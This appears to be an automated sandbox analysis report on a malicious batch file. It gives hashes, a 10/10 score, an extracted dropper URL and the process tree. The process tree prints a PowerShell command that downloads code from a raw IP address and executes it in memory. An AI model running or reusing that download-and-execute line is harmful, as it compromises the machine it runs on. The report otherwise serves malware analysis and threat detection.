Analysis
max time kernel: 106s
max time network: 108s
platform: windows10_x64
resource: win10v200217
submitted: 24-03-2020 01:10
Static task: static1
Behavioral task: behavioral1
  Sample: w7MPmXqT.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: w7MPmXqT.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: w7MPmXqT.bat
Size: 196B
MD5: f27899524a4ad3e77954797a979ba0d8
SHA1: 281223c4cf1338fa2f2ea469ea8e6f0246b5adb0
SHA256: 359a07b1df7b142cfd37af0d9cdbc28ace2ca7ffc9bd778fde48bfa501a69d79
SHA512: 2bf71ad0387cf7c0b48dca5dc95c403fa2bb7539e155505e8f740f5f991cbb4c266bf0bc790a16a4915f7c72bad871ac437f08c19ee918b2386086409a87e97d
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/w7MPmXqT
Signatures
Program crash (1 IoC)
  Processes:
    pid 3100 WerFault.exe -> target pid 3956 powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    Token: SeRestorePrivilege  pid 3100  WerFault.exe
    Token: SeBackupPrivilege   pid 3100  WerFault.exe
    Token: SeDebugPrivilege    pid 3100  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid 3100 WerFault.exe (14 entries, all the same process)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\w7MPmXqT.bat"
   PID: 4052
2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of 1)
   Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/w7MPmXqT');Invoke-SZOMRMAUGUIDZ;Start-Sleep -s 10000"
   PID: 3956
3. C:\Windows\SysWOW64\WerFault.exe (child of 2)
   Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 704
   Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
   PID: 3100